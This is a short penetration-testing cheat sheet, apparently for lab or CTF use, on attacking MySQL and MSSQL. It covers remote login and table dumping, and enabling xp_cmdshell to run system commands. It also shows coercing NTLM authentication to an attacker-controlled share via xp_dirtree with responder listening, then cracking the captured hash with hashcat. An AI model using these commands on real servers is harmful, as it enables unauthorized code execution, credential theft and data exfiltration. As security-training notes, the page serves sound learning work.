SQL

MySQL

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | sed -r '/^\s*$/d'

mysql -h 10.10.10.10 -u root -p

show databases; # Show all databases.
select version();
use qu35t; # Select one of the existing databases.
show tables; # Show all available tables in the selected database.
select * from users; # Show everything in the desired table.

MSSQL

mssqlclient.py qu35t@10.10.10.10 -windows-auth

select name from sys.databases; # List databases
select TABLE_NAME from Backup.INFORMATION_SCHEMA.TABLES; # List tables of a database
select * from Backup.dbo.Users; # Extract data from a table

Enable the module.

enable_xp_cmdshell

EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE

Execute a command.

exec xp_cmdshell "whoami"

Start the responder.

responder -I tun0

Use xp_dirtree.

exec xp_dirtree "\\10.10.10.10\qu35t\"

Use xp_subdirs.

exec xp_subdirs "\\10.10.10.10\qu35t\"

Use xp_fileexist.

exec xp_fileexist "\\10.10.10.10\qu35t\"

hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

PreviousSNMP NextRsync

Last updated 1 year ago